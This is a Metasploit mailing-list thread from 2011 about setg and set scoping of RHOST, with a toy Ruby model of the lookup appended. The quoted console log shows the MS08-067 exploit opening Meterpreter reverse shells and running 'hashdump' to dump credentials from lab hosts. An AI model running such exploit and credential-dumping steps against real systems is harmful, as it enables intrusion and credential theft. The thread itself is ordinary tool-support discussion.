Metasploit mailing list archives
Re: [RHOST] bug ?
From: Joshua Smith <lazydj98 () gmail com>
Date: Thu, 20 Oct 2011 13:29:16 -0400
Yeah, I'd have to examine the source, but I believe it's something like (in pseudo code) ldatastore['RHOST'] || gdatastore['RHOST'] so global datastore is more like the default. However, if there's no local, the local becomes the value of global so when you do the next setg, you're changing the default, however there's a local defined now, cuz you're using the exact same module and therefore the module instance hasn't changed, which would otherwise wipe out the local datastore. So I think if you changed to a different module, the setg would be all you needed, but staying in that module you've created a local.

I'm not a dev tho, I'm just an avid user ;)

-Josh

On Thu, Oct 20, 2011 at 12:17 PM, cons0ul <sachinshinde11 () gmail com> wrote:
> yeah silly me it happens here
>
> msf exploit(ms08_067_netapi) > setg RHOST 192.168.1.61
> RHOST => 192.168.1.61
>
> it's interesting RHOST is global and local variable .... is this variable overriding ?
>
> thanks,
> cons0ul
>
> On Thu, Oct 20, 2011 at 6:37 PM, Joshua Smith <lazydj98 () gmail com> wrote:
>> No, just use set the second time instead of setg. The global datastore is used if there's nothing in the local store, which is the case in your scenario.
>>
>> -Josh
>>
>> On Oct 20, 2011, at 4:16 AM, cons0ul <sachinshinde11 () gmail com> wrote:
>>> msf exploit(ms08_067_netapi) > version
>>> Framework: 4.1.0-release.13988
>>> Console : 4.1.0-release.13581
>>>
>>> :)
>>>
>>> On Thu, Oct 20, 2011 at 1:43 PM, cons0ul <sachinshinde11 () gmail com> wrote:
>>>> Hi,
>>>>
>>>> I was just testing smb exploits in our testing lab and this is what I did
>>>>
>>>> msf exploit(ms08_067_netapi) > setg RHOST 192.168.1.61
>>>> RHOST => 192.168.1.61
>>>> msf exploit(ms08_067_netapi) > exploit
>>>> [*] Started reverse handler on 192.168.1.7:4444
>>>> [*] Automatically detecting the target...
>>>> [*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
>>>> [*] We could not detect the language pack, defaulting to English
>>>> [*] Selected Target: Windows 2003 SP2 English (NX)
>>>> [*] Attempting to trigger the vulnerability...
>>>> [*] Sending stage (752128 bytes) to 192.168.1.61
>>>> [*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.61:1977) at 2011-10-20 13:32:46 +0530
>>>> meterpreter > hashdump
>>>> meterpreter > background
>>>> msf exploit(ms08_067_netapi) > setg RHOST 192.168.1.62
>>>> RHOST => 192.168.1.62
>>>> msf exploit(ms08_067_netapi) > exploit
>>>> [*] Started reverse handler on 192.168.1.7:4444
>>>> [*] Automatically detecting the target...
>>>> [*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
>>>> [*] We could not detect the language pack, defaulting to English
>>>> [*] Selected Target: Windows 2003 SP2 English (NX)
>>>> [*] Attempting to trigger the vulnerability...
>>>> [*] Sending stage (752128 bytes) to 192.168.1.61
>>>> [*] Meterpreter session 2 opened (192.168.1.7:4444 -> 192.168.1.61:1978) at 2011-10-20 13:33:56 +0530
>>>>
>>>> is it a bug ?
>>>>
>>>> thanks,
>>>> cons0ul

--
- Josh
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
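Added example, not part of the thread and not Metasploit's own code: a toy Ruby model of the lookup the message above describes (local value first, global as fallback, with the global value copied into the module instance on use). The class and method names, including the shadowed? scope check, are hypothetical; the copy-on-use step is the poster's stated belief, taken here as an assumption.

```ruby
# Toy model of the behaviour described in the thread; NOT Metasploit source.
# Class and method names here are hypothetical.
class ToyModule
  def initialize(global)
    @global = global   # shared store, written by "setg"
    @local  = {}       # per-instance store, written by "set"
  end

  def set(key, value)
    @local[key] = value
  end

  # The lookup from the post: ldatastore[key] || gdatastore[key]
  def effective(key)
    @local[key] || @global[key]
  end

  # Assumption from the post: using the global value leaves a local copy.
  def run(key)
    @local[key] ||= @global[key]
  end

  # True when a stale local value hides the current global one.
  def shadowed?(key)
    @local.key?(key) && @global.key?(key) && @local[key] != @global[key]
  end
end

# Replays the reported session; the addresses are the ones from the thread.
def replay
  global = {}
  mod = ToyModule.new(global)
  global['RHOST'] = '192.168.1.61'   # first setg
  first = mod.run('RHOST')
  global['RHOST'] = '192.168.1.62'   # second setg, same module instance
  second = mod.run('RHOST')          # local copy still wins
  stale = mod.shadowed?('RHOST')     # pre-run scope check flags the mismatch
  mod.set('RHOST', '192.168.1.62')   # remedy 1: set instead of setg
  fixed_by_set = mod.run('RHOST')
  fresh = ToyModule.new(global)      # remedy 2: a different module instance
  fixed_by_new = fresh.run('RHOST')
  { first: first, second: second, stale: stale,
    fixed_by_set: fixed_by_set, fixed_by_new: fixed_by_new }
end

p replay if __FILE__ == $PROGRAM_NAME
```

In this model the second run still resolves to the first address until the local value is overwritten or a new instance is created, which matches the session output quoted in the thread.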